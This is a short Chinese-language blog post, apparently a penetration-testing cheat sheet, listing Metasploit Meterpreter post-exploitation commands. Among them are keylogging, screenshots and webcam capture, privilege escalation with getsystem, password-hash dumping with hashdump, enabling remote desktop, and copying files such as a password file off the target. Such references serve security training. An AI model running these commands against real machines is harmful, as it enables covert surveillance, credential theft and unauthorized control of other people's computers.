Metasploit渗透——meterpreter基础命令

Posted 2022-12-11 Thgilil

Meterpreter
系统信息

sysinfo

用户标识

getuid

获取权限

getsystem

当前目录

pwd

列举进程

ps

键盘记录

##扫描远程计算机键盘活动
keyscan_start

##显示远程计算机键盘活动
keyscan_dump

##停止扫描远程计算机键盘活动
keyscan_stop

显示驱动器

show_mount

截屏
保存远程PC的屏幕截图

screenshot

从kali上传文件

upload /root/abc.exe C:\\\\system32\\\\

下载

download C:\\\\pass.txt /root/

获取远程计算机的cmd

shell

服务器sid

getsid

远程计算机IP地址及Mac地址

ipconfig

将当前活动的Meterpreter会话发送到后台

background

将当前进程从一个端口迁移到另一个

migrate <端口>

重启远程计算机

reboot

摄像头

##查看是否具有摄像头
webcarm_list

##摄像头拍摄照片
webcam_snap

##摄像头开启视频
webcam_stream

当前进程的pid

getpid

当地时间

localtime

生成文件hash值

checksum md5 abc.txt

读取文件

cat my.ini

复制文件

cp abc.txt pass.txt
cp <旧文件> <新文件>

目录

dir

编辑文件

edit abc.txt
##和vim命令的使用方法相同

移动文件

mv <旧文件目录> <新文件目录>
##和linux中的mv命令相同

删除文件

rm <file1> <file2> ...
##和linux中的rm命令相同

创建目录

mkdir <目录名1> <目录名2> ...

搜索

search -f *.jpeg

开启靶机3389端口

run getgui -e

枚举账户hash散列值

run hashdump

列举后渗透模块

load -l